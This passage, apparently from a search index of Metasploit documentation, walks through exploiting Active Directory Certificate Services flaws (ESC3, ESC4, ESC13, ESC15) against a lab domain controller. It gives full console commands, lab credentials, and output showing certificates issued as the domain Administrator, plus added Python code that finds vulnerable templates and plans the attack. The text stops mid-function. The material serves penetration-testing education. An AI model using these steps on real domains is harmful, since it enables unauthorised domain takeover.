RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216180342_default_unknown_windows.ad.cs_390825.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . We can then use the kerberos/get_ticket module to obtain a Kerberos ticket granting ticket (TGT) as the Administrator account (RID 500, a Domain Admin, as the certificate SID above shows). See the Getting A Kerberos Ticket section for more information. ",
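    "example": "The finder’s split of templates into the two ESC3 roles, and the narrowing step above, as an added Python example (written for this page, not code from Metasploit or the ldap_esc_vulnerable_cert_finder module). The role tests follow the conditions the finder checks: an enrollment agent EKU with no manager approval and no co-signature for role 1; an authentication EKU (or no EKU at all) with either schema version 1 or exactly one required signature carrying the Certificate Request Agent policy for role 2. The templates and SIDs are constructed to resemble the ones on this page, and enroll_sids stands in for the enrollment rights the finder extracts from nTSecurityDescriptor:

```python
# Added example (not code from Metasploit or the ldap_esc_vulnerable_cert_finder
# module): sort certificate templates into the two ESC3 roles using the LDAP
# attributes the finder reads, then narrow both lists to the templates a given
# set of SIDs can enroll in. The sample templates are constructed to mirror
# the ones discussed on this page; they are not real finder output.
OID_CERT_REQUEST_AGENT = '1.3.6.1.4.1.311.20.2.1'
OID_CLIENT_AUTH = '1.3.6.1.5.5.7.3.2'
OID_PKINIT_CLIENT = '1.3.6.1.5.2.3.4'
OID_SMARTCARD_LOGON = '1.3.6.1.4.1.311.20.2.2'
OID_ANY_PURPOSE = '2.5.29.37.0'
AUTH_EKUS = {OID_CLIENT_AUTH, OID_PKINIT_CLIENT, OID_SMARTCARD_LOGON, OID_ANY_PURPOSE}
CT_FLAG_PEND_ALL_REQUESTS = 0x2  # msPKI-Enrollment-Flag bit: manager approval required


def requires_manager_approval(t):
    return bool(t['msPKI-Enrollment-Flag'] & CT_FLAG_PEND_ALL_REQUESTS)


def is_esc3_template_1(t):
    # Role 1: issues an enrollment agent certificate with no manager approval
    # and no co-signature, so one request as a normal user yields the agent cert.
    return (OID_CERT_REQUEST_AGENT in t['pKIExtendedKeyUsage']
            and not requires_manager_approval(t)
            and t['msPKI-RA-Signature'] == 0)


def is_esc3_template_2(t):
    # Role 2: issues a certificate usable for domain authentication and accepts
    # a request co-signed by an enrollment agent. Schema version 1 templates
    # cannot express an application policy requirement at all; later versions
    # must demand exactly one signature carrying the Certificate Request Agent
    # policy (this mirrors the finder's LDAP filter, simplified).
    ekus = set(t['pKIExtendedKeyUsage'])
    if ekus and ekus.isdisjoint(AUTH_EKUS):
        return False  # an EKU list without any authentication EKU
    if requires_manager_approval(t):
        return False
    if t['msPKI-Template-Schema-Version'] == 1:
        return True
    return (t['msPKI-RA-Signature'] == 1
            and OID_CERT_REQUEST_AGENT in t['msPKI-RA-Application-Policies'])


def esc3_roles(templates):
    # What the finder reports: roles per template, ignoring who may enroll.
    roles = {}
    for t in templates:
        found = set()
        if is_esc3_template_1(t):
            found.add('ESC3_TEMPLATE_1')
        if is_esc3_template_2(t):
            found.add('ESC3_TEMPLATE_2')
        roles[t['cn']] = found
    return roles


def plan_esc3(templates, attacker_sids):
    # The narrowing step from the text: keep only templates whose enrollment
    # SIDs overlap the attacker's token. Returns (agent templates, target templates).
    roles = esc3_roles(templates)
    usable = [t for t in templates if not set(t['enroll_sids']).isdisjoint(attacker_sids)]
    agents = sorted(t['cn'] for t in usable if 'ESC3_TEMPLATE_1' in roles[t['cn']])
    targets = sorted(t['cn'] for t in usable if 'ESC3_TEMPLATE_2' in roles[t['cn']])
    return agents, targets


def template(cn, ekus, enroll_sids, schema=2, ra_signature=0, ra_policies=(), flags=0):
    return {'cn': cn, 'pKIExtendedKeyUsage': list(ekus), 'enroll_sids': list(enroll_sids),
            'msPKI-Template-Schema-Version': schema, 'msPKI-RA-Signature': ra_signature,
            'msPKI-RA-Application-Policies': list(ra_policies), 'msPKI-Enrollment-Flag': flags}


# Constructed sample data (the domain SID is the one in the page's output).
DOMAIN = 'S-1-5-21-3290009963-1772292745-3260174523'
AUTHENTICATED_USERS, DOMAIN_USERS = 'S-1-5-11', DOMAIN + '-513'
DOMAIN_COMPUTERS, DOMAIN_ADMINS, ENTERPRISE_ADMINS = DOMAIN + '-515', DOMAIN + '-512', DOMAIN + '-519'
OID_SERVER_AUTH, OID_EMAIL, OID_EFS = '1.3.6.1.5.5.7.3.1', '1.3.6.1.5.5.7.3.4', '1.3.6.1.4.1.311.10.3.4'
SAMPLE_TEMPLATES = [
    template('ESC3-Template1', [OID_CERT_REQUEST_AGENT], [AUTHENTICATED_USERS]),
    template('ESC3-Template2', [OID_CLIENT_AUTH], [AUTHENTICATED_USERS],
             ra_signature=1, ra_policies=[OID_CERT_REQUEST_AGENT]),
    template('User', [OID_CLIENT_AUTH, OID_EMAIL, OID_EFS], [DOMAIN_USERS, DOMAIN_ADMINS], schema=1),
    template('Administrator', [OID_CLIENT_AUTH, OID_EMAIL, OID_EFS], [DOMAIN_ADMINS, ENTERPRISE_ADMINS], schema=1),
    template('Machine', [OID_CLIENT_AUTH, OID_SERVER_AUTH], [DOMAIN_COMPUTERS, DOMAIN_ADMINS], schema=1),
    template('SubCA', [], [DOMAIN_ADMINS, ENTERPRISE_ADMINS], schema=1),
    # Same as ESC3-Template1 but gated by manager approval, so no longer role 1.
    template('ESC3-Approved', [OID_CERT_REQUEST_AGENT], [AUTHENTICATED_USERS], flags=CT_FLAG_PEND_ALL_REQUESTS),
]
NORMAL_USER_SIDS = {AUTHENTICATED_USERS, DOMAIN_USERS}

if __name__ == '__main__':
    print(esc3_roles(SAMPLE_TEMPLATES))
    print(plan_esc3(SAMPLE_TEMPLATES, NORMAL_USER_SIDS))
```

Running the file prints the per-template roles and the (agent, target) plan. As on this page, SubCA, Administrator and Machine come out as ESC3_TEMPLATE_2 in esc3_roles, and it is the enrollment filter in plan_esc3 that drops them, which is exactly what the walkthrough does by hand.",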
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc3-to-gain-domain-administrator-privileges",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc3-to-gain-domain-administrator-privileges"
  },"23": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC4 To Gain Domain Administrator Privileges",
    "content": "To exploit ESC4, we will require an account with write privileges over a certificate template object in Active Directory. This involves finding an object with weak permissions defined within the nTSecurityDescriptor field. With this object identified, we can modify it to reconfigure the template to be vulnerable to another ESC technique. First, we will use the icpr_cert module in an attempt to exploit ESC1 (by setting ALT_UPN). This fails because the ESC4-Test certificate template does not allow the certificate’s subject name to be supplied in the request (the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is not set in the msPKI-Certificate-Name-Flag field). msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA daforest-WIN-BR0CCBA815B-CA CA =&amp;gt; daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_UPN [email protected] ALT_UPN =&amp;gt; [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [-] 172.30.239.85:445 - There was an error while requesting the certificate. [-] 172.30.239.85:445 - Denied by Policy Module [-] 172.30.239.85:445 - Error details: [-] 172.30.239.85:445 - Source: (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer. [-] 172.30.239.85:445 - HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name. 
[*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, we use the ad_cs_cert_template module to update the ESC4-Test certificate template. This process first writes a backup of the template’s current data to loot so that it can be restored later. Next, the module’s local certificate template data (by default a template definition that is vulnerable to ESC1) is read and used to update the object in Active Directory. That local template data can be modified, for example to set a custom security descriptor. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME normaluser USERNAME =&amp;gt; normaluser msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD normalpass PASSWORD =&amp;gt; normalpass msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION UPDATE ACTION =&amp;gt; UPDATE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set VERBOSE true VERBOSE =&amp;gt; true msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 172.30.239.85 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.30.239.85:389 Getting root DSE [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json [*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU) [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . 
Now that the certificate template has been updated to be vulnerable to ESC1, we can use the previous command to switch back to the icpr_cert module and reattempt the request. This time, the operation succeeds. msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; previous msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Finally, we switch back to the ad_cs_cert_template module to restore the original configuration. We do this by pointing the TEMPLATE_FILE option at the JSON backup written by the previous run. Note that this restore run writes a further backup (of the ESC1-vulnerable state) before applying the file. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; previous msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json TEMPLATE_FILE =&amp;gt; /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 172.30.239.85 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.30.239.85:389 Getting root DSE [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083942_default_172.30.239.85_windows.ad.cs.te_000095.json [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . 
At this point the certificate template’s configuration has been restored and the operator has a certificate that can be used to authenticate to Active Directory as the Domain Admin. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc4-to-gain-domain-administrator-privileges",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc4-to-gain-domain-administrator-privileges"
  },"24": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC13",
    "content": "To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn’t necessarily guaranteed to yield administrative privileges, rather the privileges that are gained are those of the group which is linked to by OID in the certificate template’s issuance policy. The auxiliary/gather/ldap_esc_vulnerable_cert_finder module is capable of identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions. msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; run ... [+] Template: ESC13-Test [*] Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC13 [*] Notes: ESC13 groups: ESC13-Group [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins) [*] * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users) [*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins) [+] Issuing CA: collalabs1-SRV-ADDS01-CA (SRV-ADDS01.collalabs1.local) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins) [*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins) . In this case, the ticket can be issued with the icpr_cert module. No additional options are required to issue the certificate beyond the standard CA, CERT_TEMPLATE, target and authentication options. 
msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain COLLALABS1 SMBDomain =&amp;gt; COLLALABS1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA collalabs1-SRV-ADDS01-CA CA =&amp;gt; collalabs1-SRV-ADDS01-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC13-Test CERT_TEMPLATE =&amp;gt; ESC13-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate Email: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3474343397-3755413101-2031708755-10051 [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20240226170310_default_172.30.239.85_windows.ad.cs_917878.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) with the ESC13-Group RID present in the Groups field of the TGT PAC. ",
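    "example": "The attribute chain the finder follows for ESC13, as an added Python example (written for this page, not the finder module’s code). A template’s msPKI-Certificate-Policy attribute lists issuance policy OIDs; each OID has an msPKI-Enterprise-Oid object under CN=OID,CN=Public Key Services in the Configuration partition, and that object’s msDS-OIDToGroupLink attribute names the group whose SID the KDC adds to the PAC of anyone authenticating with such a certificate. The records here are constructed: only the template and group names mirror the page’s output, and the issuance policy OIDs are made up:

```python
# Added example (not the ldap_esc_vulnerable_cert_finder module's code): resolve
# the groups an ESC13 template would grant by walking msPKI-Certificate-Policy
# on the template, the msPKI-Enterprise-Oid object for each policy OID, and
# that object's msDS-OIDToGroupLink. All records below are constructed; only
# the template and group names mirror this page, the policy OIDs are made up.
OID_CLIENT_AUTH = '1.3.6.1.5.5.7.3.2'
AUTH_EKUS = {OID_CLIENT_AUTH, '1.3.6.1.5.2.3.4', '1.3.6.1.4.1.311.20.2.2', '2.5.29.37.0'}
CT_FLAG_PEND_ALL_REQUESTS = 0x2   # msPKI-Enrollment-Flag: manager approval
GROUP_TYPE_UNIVERSAL = 0x8        # groupType bit; the OID-to-group link needs a universal group


def authentication_capable(template):
    # ESC13 needs a certificate the KDC will accept for PKINIT: an authentication
    # EKU (or no EKU restriction at all), no manager approval, no co-signature.
    ekus = set(template['pKIExtendedKeyUsage'])
    if ekus and ekus.isdisjoint(AUTH_EKUS):
        return False
    if template['msPKI-Enrollment-Flag'] & CT_FLAG_PEND_ALL_REQUESTS:
        return False
    return template['msPKI-RA-Signature'] == 0


def linked_groups(template, oid_objects, groups):
    # Return [(group cn, group SID)] for every issuance policy on the template
    # that links to a universal group. oid_objects is keyed by policy OID (the
    # msPKI-Cert-Template-OID of the msPKI-Enterprise-Oid object), groups by DN.
    out = []
    for policy_oid in template['msPKI-Certificate-Policy']:
        link = oid_objects.get(policy_oid, {}).get('msDS-OIDToGroupLink')
        group = groups.get(link) if link else None
        if group and group['groupType'] & GROUP_TYPE_UNIVERSAL:
            out.append((group['cn'], group['objectSid']))
    return out


def find_esc13(templates, oid_objects, groups):
    # What the finder's ESC13 notes would report: template cn mapped to linked groups.
    found = {}
    for t in templates:
        if not authentication_capable(t):
            continue
        linked = linked_groups(t, oid_objects, groups)
        if linked:
            found[t['cn']] = linked
    return found


# Constructed sample data (domain SID and names taken from the page's output).
DOMAIN = 'S-1-5-21-3474343397-3755413101-2031708755'
BASE = 'DC=collalabs1,DC=local'
POLICY_LINKED = '1.3.6.1.4.1.311.21.8.1111.2222.3333.4444.5555.6666.7777.8888'
POLICY_GLOBAL = '1.3.6.1.4.1.311.21.8.1111.2222.3333.4444.5555.6666.7777.9999'
POLICY_UNLINKED = '1.3.6.1.4.1.311.21.8.1111.2222.3333.4444.5555.6666.7777.1234'
OID_OBJECTS = {
    POLICY_LINKED: {'msDS-OIDToGroupLink': 'CN=ESC13-Group,CN=Users,' + BASE},
    POLICY_GLOBAL: {'msDS-OIDToGroupLink': 'CN=Global-Group,CN=Users,' + BASE},
    POLICY_UNLINKED: {},
}
GROUPS = {
    'CN=ESC13-Group,CN=Users,' + BASE: {'cn': 'ESC13-Group', 'groupType': 0x80000008, 'objectSid': DOMAIN + '-1108'},
    'CN=Global-Group,CN=Users,' + BASE: {'cn': 'Global-Group', 'groupType': 0x80000002, 'objectSid': DOMAIN + '-1109'},
}


def template(cn, policies, ekus=(OID_CLIENT_AUTH,), flags=0, ra_signature=0):
    return {'cn': cn, 'msPKI-Certificate-Policy': list(policies), 'pKIExtendedKeyUsage': list(ekus),
            'msPKI-Enrollment-Flag': flags, 'msPKI-RA-Signature': ra_signature}


SAMPLE_TEMPLATES = [
    template('ESC13-Test', [POLICY_LINKED]),
    template('ESC13-Global', [POLICY_GLOBAL]),       # linked, but not to a universal group
    template('ESC13-Unlinked', [POLICY_UNLINKED]),   # policy OID with no group link
    template('ESC13-Approved', [POLICY_LINKED], flags=CT_FLAG_PEND_ALL_REQUESTS),
    template('ESC13-NoAuth', [POLICY_LINKED], ekus=['1.3.6.1.5.5.7.3.1']),  # server auth only
    template('User', []),
]

if __name__ == '__main__':
    print(find_esc13(SAMPLE_TEMPLATES, OID_OBJECTS, GROUPS))
```

Only ESC13-Test survives all three gates (an authentication-capable template, a policy OID that carries a link, a universal group at the other end), which matches the single ESC13 entry the finder reported above.",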
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc13",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc13"
  },"25": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC15",
    "content": "Steps for exploiting ESC15 are similar to ESC1 whereby a privileged user such as a domain admin is specified in the ALT_UPN. In addition to targeting another user, the certificate has additional Application Policy OIDs added to it which adjusts the context in which the issued certificate can be used. These policy OIDs are accepted by the issuing CA if the target certificate template is defined using schema version 1. In the following example, the Client Authentication OID (1.3.6.1.5.5.7.3.2) is added which enables the certificate to be used for authentication to LDAP via SCHANNEL. The operator can then perform LDAP queries with the privileges of the user specified in the alternate UPN. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain COLLALABS1 SMBDomain =&amp;gt; COLLALABS1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA collalabs1-SRV-ADDS01-CA CA =&amp;gt; collalabs1-SRV-ADDS01-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC15-Test CERT_TEMPLATE =&amp;gt; ESC15-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ADD_CERT_APP_POLICY 1.3.6.1.5.5.7.3.2 ADD_CERT_APP_POLICY =&amp;gt; 1.3.6.1.5.5.7.3.2 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_UPN [email protected] ALT_UPN =&amp;gt; [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000 ALT_SID =&amp;gt; S-1-5-21-3402587289-1488798532-3618296993-1000 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate Policies: [*] 172.30.239.85:445 - * 1.3.6.1.5.5.7.3.2 (Client Authentication) [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009171337_default_172.30.239.85_windows.ad.cs_089081.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Certificates issued using this technique cannot directly be used for Kerberos authentication via PKINIT. However, the attack can be modified by adding the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) instead, which yields an enrollment agent certificate that, much as in the ESC2 flow, can then be used to request PKINIT-compatible certificates on behalf of other users. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain COLLALABS1 SMBDomain =&amp;gt; COLLALABS1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA collalabs1-SRV-ADDS01-CA CA =&amp;gt; collalabs1-SRV-ADDS01-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC15-Test CERT_TEMPLATE =&amp;gt; ESC15-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1 ADD_CERT_APP_POLICY =&amp;gt; 1.3.6.1.4.1.311.20.2.1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. 
[*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate Policies: [*] 172.30.239.85:445 - * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent) [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, the certificate is used in conjunction with the PFX and ON_BEHALF_OF options to issue a certificate compatible with Kerberos as the privileged user (previously ALT_UPN). msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; unset ADD_CERT_APP_POLICY Unsetting ADD_CERT_APP_POLICY... msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; unset ALT_UPN Unsetting ALT_UPN... msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF COLLALABS1\\\\administrator ON_BEHALF_OF =&amp;gt; COLLALABS1\\\\administrator msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx PFX =&amp;gt; /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate Email: [email protected] [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172817_default_172.30.239.85_windows.ad.cs_427087.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Finally, this certificate can be used to authenticate to Kerberos with the kerberos/get_ticket module. ",
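    "example": "What ADD_CERT_APP_POLICY puts into the request, as an added Python example (written for this page, not the icpr_cert module’s code). The Microsoft Application Policies extension (szOID_APPLICATION_CERT_POLICIES, 1.3.6.1.4.1.311.21.10) has the same ASN.1 shape as certificatePolicies: a SEQUENCE OF PolicyInformation, each a SEQUENCE wrapping one policy OID. The example hand-encodes the extension in DER and decodes it again to check the round trip; how the module embeds the extension in the CSR itself is standard request handling and is not shown here:

```python
# Added example (not the icpr_cert module's code): build and parse Microsoft's
# Application Policies extension, the structure ADD_CERT_APP_POLICY adds to the
# request. Hand-rolled DER keeps this free of third-party libraries.
OID_APPLICATION_CERT_POLICIES = '1.3.6.1.4.1.311.21.10'  # szOID_APPLICATION_CERT_POLICIES
OID_CLIENT_AUTH = '1.3.6.1.5.5.7.3.2'
OID_CERT_REQUEST_AGENT = '1.3.6.1.4.1.311.20.2.1'
TAG_OID, TAG_OCTET_STRING, TAG_SEQUENCE = 0x06, 0x04, 0x30


def der_length(n):
    # Short form below 128; long form is 0x80 | byte count, then big-endian bytes.
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag, payload):
    return bytes([tag]) + der_length(len(payload)) + payload


def encode_oid(dotted):
    # The first two arcs share one byte (40*a + b); every later arc is base-128
    # with the high bit set on all but its last byte.
    arcs = [int(a) for a in dotted.split('.')]
    if len(arcs) < 2 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError('invalid OID ' + dotted)
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return der_tlv(TAG_OID, bytes(out))


def application_policies_extension(policy_oids):
    # Extension ::= SEQUENCE { extnID OID, extnValue OCTET STRING }; the OCTET
    # STRING wraps SEQUENCE OF PolicyInformation ::= SEQUENCE { policyIdentifier OID }.
    # critical keeps its DEFAULT FALSE and is therefore omitted.
    policies = b''.join(der_tlv(TAG_SEQUENCE, encode_oid(oid)) for oid in policy_oids)
    value = der_tlv(TAG_SEQUENCE, policies)
    return der_tlv(TAG_SEQUENCE, encode_oid(OID_APPLICATION_CERT_POLICIES) + der_tlv(TAG_OCTET_STRING, value))


def read_tlv(data, pos):
    # Decode one TLV starting at pos; returns (tag, payload, position after it).
    tag, first, pos = data[pos], data[pos + 1], pos + 2
    length = first
    if first & 0x80:
        count = first & 0x7F
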